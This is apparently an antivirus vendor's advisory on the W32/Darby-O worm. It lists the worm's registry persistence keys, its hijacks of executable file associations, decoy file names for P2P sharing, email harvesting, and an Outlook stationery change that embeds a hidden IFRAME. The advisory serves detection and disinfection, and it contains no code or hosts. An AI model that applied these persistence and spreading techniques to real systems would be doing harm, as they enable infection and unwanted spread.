W32/Darby-O

Please follow the instructions for disinfecting PE executables.

W32/Darby-O is an IRC and peer-to-peer (P2P) worm. When the worm is first
run it displays the following fake error message in English or Spanish:

"Impossible to open the file, <filename> this total or partially damaged."

W32/Darby-O registers itself as a service with the display name
"GEDZAC Service". The worm creates several copies of itself in the Windows
system folder. The filenames can be randomly generated or can be chosen from
the following with the extensions EXE, COM or SCR:

ACCDEFRAGINFO
Image0X
KillUsa
W2KEXPLORERBRD
W2KRUNDLSET

The worm adds an entry to system.ini under the BOOT section:
shell= explorer.exe <path to worm copy>

In order to run on system startup, W32/Darby-O also creates the following
registry entries:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\
run = <path to worm copy>

HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\Bardiel
StubPath = <path to worm copy>

[HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Run]
ACCDEFRAGINFO = <path to worm copy>

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
ACCDEFRAGINFO = <path to worm copy>

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Shell = Explorer.exe <path to worm copy>

The worm also changes the following registry entries so that a copy of the
worm is run each time a BAT, COM, EXE, PIF, REG or SCR file are run:

HKCR\batfile\shell\open\command
@="%System%\<path to worm copy> \"%1\" %*"

HKCR\comfile\shell\open\command
@="%System%\<path to worm copy> \"%1\" %*"

HKCR\exefile\shell\open\command
@="%System%\<path to worm copy> \"%1\" %*"

HKCR\piffile\shell\open\command
@="%System%\<path to worm copy> \"%1\" %*"

HKCR\regfile\shell\open\command
@="GDC"

HKCR\scrfile\shell\open\command
@="%System%\<path to worm copy> \"%1\" /S"

The worm also creates several entries under the following:

HKLM\SYSTEM\CurrentControlSet\Services\GEDZAC LABS
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\Bardiel
HKLM\SOFTWARE\GedzacLABS\Bardiel.d

W32/Darby-O creates additional copies of itself into shared P2P folders using
the following names:

ACDSee 5.5.exe
AOL Instant Messenger.exe
AVP Antivirus Pro Key Crack.exe
Age of Empires 2 crack.exe
Ana Kournikova Sex Video.exe
Animated Screen 7.0b.exe
AquaNox2 Crack.exe
Audiograbber 2.05.exe
BabeFest 2004 ScreenSaver 1.5.exe
Babylon 3.50b reg_crack.exe
Battlefield1942_bloodpatch.exe
Battlefield1942_keygen.exe
Britney Spears Sex Video.exe
Buffy Vampire Slayer Movie.exe
Business Card Designer Plus 7.9.exe
Clone CD 5.0.0.3 (crack).exe
Clone CD 5.0.0.3.exe
Coffee Cup Free zip 7.0b.exe
Cool Edit Pro v2.55.exe
Crack Passwords Mail.exe
Credit Card Numbers generator(incl Visa,MasterCard,...).exe
Cristina Aguilera Sex Video.exe
DVD Copy Plus v5.0.exe
DVD Region-Free 2.3.exe
Diablo 2 Crack.exe
DirectDVD 5.0.exe
DirectX Buster (all versions).exe
DirectX InfoTool.exe
DivX Video Bundle 6.5.exe
Download Accelerator Plus 6.1.exe
Edonkey2000-Speed me up scotty.exe
FIFA2004 crack.exe
Final Fantasy VII XP Patch 1.5.exe
Flash MX crack (trial).exe
FlashGet 1.5.exe
FreeRAM XP Pro 1.9.exe
GTA 3 Crack.exe
GTA 3 Serial.exe
Game Cube Real Emulator.exe
GetRight 5.0a.exe
Global DiVX Player 3.0.exe
Gothic2 licence.exe
Guitar Chords Library 5.5.exe
Hentai Anime Girls Movie.exe
Hitman_2_no_cd_crack.exe
Hot Babes XXX Screen Saver.exe
HotGirls.exe
Hotmail Hacker 2004-Xss Exploit.exe
ICQ Pro 2004a.exe
ICQ Pro 2004b (new beta).exe
IrfanView 4.5.exe
Jenifer Lopez Sex Video.exe
KaZaA Hack 2.5.0.exe
KaZaA Speedup 3.6.exe
Kazaa SDK + Xbit speedUp for 2.xx.exe
Links 2004 Golf game (crack).exe
Living Waterfalls 1.3.exe
MSN Messenger 5.2.exe
Mafia_crack.exe
Matrix Movie.exe
Matrix Screensaver 1.5.exe
Mcafee Antivirus Scan Crack.exe
MediaPlayer Update.exe
Microsoft KeyGenerator-Allmost all microsoft stuff.exe
NBA2004_crack.exe
NHL 2004 crack.exe
Need 4 Speed crack.exe
Nero Burning ROM crack.exe
Netbios Nuker 2004.exe
Netfast 1.8.exe
Network Cable e ADSL Speed 2.0.5.exe
Nimo CodecPack (new) 8.0.exe
Norton Anvirus Key Crack.exe
PS2 PlayStation Simulator.exe
PalTalk 5.01b.exe
Panda Antivirus Titanium Crack.exe
PerAntivirus 8.9.exe
Pop-Up Stopper 3.5.exe
Popup Defender 6.5.exe
Quick Time Key Crack.exe
QuickTime_Pro_Crack.exe
Sakura Card Captor Movie.exe
Screen saver christina aguilera naked.exe
Screen saver christina aguilera.exe
Security-2004-Update.exe
Serials 2004 v.8.0 Full.exe
Sex Live Simulator.exe
Sex Passwords.exe
SmartFTP 2.0.0.exe
SmartRipper v2.7.exe
Space Invaders 1978.exe
Spiderman Movie.exe
Splinter_Cell_Crack.exe
Starcraft serial.exe
Start Wars Trilogy Movies.exe
Steinberg_WaveLab_5_crack.exe
Stripping MP3 dancer+crack.exe
Thalia Sex Video.exe
The Hacker Antivirus 5.7.exe
Trillian 0.85 (free).exe
TweakAll 3.8.exe
UT2004_bloodpatch.exe
UT2004_keygen.exe
UT2004_no cd (crack).exe
UT2004_patch.exe
Unreal2_bloodpatch.exe
Unreal2_crack.exe
Virtua Girl (Full).exe
VirtualSex.exe
Visual Basic 6.0 Msdn Plugin.exe
Visual basic 6.exe
WarCraft_3_crack.exe
WinOnCD 4 PE_crack.exe
WinRar 3.xx Password Cracker.exe
WinZip 9.0b.exe
WinZipped Visual C++ Tutorial.exe
Winamp 3.8.exe
WindowBlinds 4.0.exe
Windows XP complete + serial.exe
Windows Xp Exploit.exe
Winzip KeyGenerator Crack.exe
XNuker 2004 2.93b.exe
Yahoo Messenger 6.0.exe
Zelda Classic 2.00.exe
aol cracker.exe
aol password cracker.exe
cable modem ultility pack.exe
counter-strike.exe
delphi.exe
divx pro.exe
divx_pro.exe
hotmail_hack.exe
iMesh 3.6.exe
iMesh 3.7b (beta).exe
index.exe
mIRC 6.40.exe
macromedia dreamweaver key generator.exe
mp3Trim PRO 2.5.exe
pamela_anderson.exe
play station emulator.exe
serials2000.exe
subseven.exe
vb6.exe
virtua girl - adriana.exe
virtua girl - bailey short skirt.exe
warcraft 3 crack.exe
warcraft 3 serials.exe
winamp plugin pack.exe
winzip full version key generator.exe

To ensure that the worm copies are shared, W32/Darby-O edits several settings
under the registry entries for common P2P applications:
KaZaA, Shareaza, Bearshare, Applejuice, Morpheus, eDonkey, FileTopia, Grokster,
iMesh, Limewire, Gnucleus, Overnet and Soulseek

W32/Darby-O also harvests email addresses from files with extensions
containing the following:
.ht
.txt
.php
.asp

The worm also creates the following files:
%Windows%\microsoftweb.htm
%Windows%\System32girc.zip
%Windows%\Logfiles\w3svc1\<random>.log
%Windows%\bZip.exe
%Windows%\gzip.zip
\Bardiel.hta
%Temp%\bh.dat
%Temp%\bm.dat

The worm then modifies settings for Microsoft Outlook and Outlook Express
by setting the following registry entries:

HKCU\Identities\(593D69E8-BC74-4EFD-93F0-22C74CFDAA77)\Software\
Microsoft\Outlook Express\5.0\Mail
Message Send HTML=dword:00000001
Stationery Name=%Windows%\microsoftweb.htm
Wide Stationery Name=%Windows%\microsoftweb.htm

HKCU\Identities\(593D69E8-BC74-4EFD-93F0-22C74CFDAA77)\Software\
Microsoft\Outlook Express\6.0\Mail
Message Send HTML=dword:00000001
Stationery Name=%Windows%\microsoftweb.htm
Wide Stationery Name=%Windows%\microsoftweb.htm

HKCU\Identities\(593D69E8-BC74-4EFD-93F0-22C74CFDAA77)\Software\
Microsoft\Outlook Express\Mail
Message Send HTML=dword:00000001
Stationery Name=%Windows%\microsoftweb.htm
Wide Stationery Name=%Windows%\microsoftweb.htm

HKCU\Software\Microsoft\Office\10.0\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\10.0\Outlook\Options\Mail
EditorPreference=dword:00020000

HKCU\Software\Microsoft\Office\11.0\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\11.0\Outlook\Options\Mail
EditorPreference=dword:00020000

HKCU\Software\Microsoft\Office\8.0\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\8.0\Outlook\Options\Mail
EditorPreference=dword:00020000

HKCU\Software\Microsoft\Office\9.0\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\9.0\Outlook\Options\Mail
EditorPreference=dword:00020000

HKCU\Software\Microsoft\Office\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\Outlook\Options\Mail
EditorPreference=dword:00020000

The microsoftweb.htm file is then used as the default template for all outgoing
email sent from Outlook or Outlook Express and contains a hidden IFRAME object
which connects to a remote site and downloads additional content.

W32/Darby-O also disables access to registry editing tools.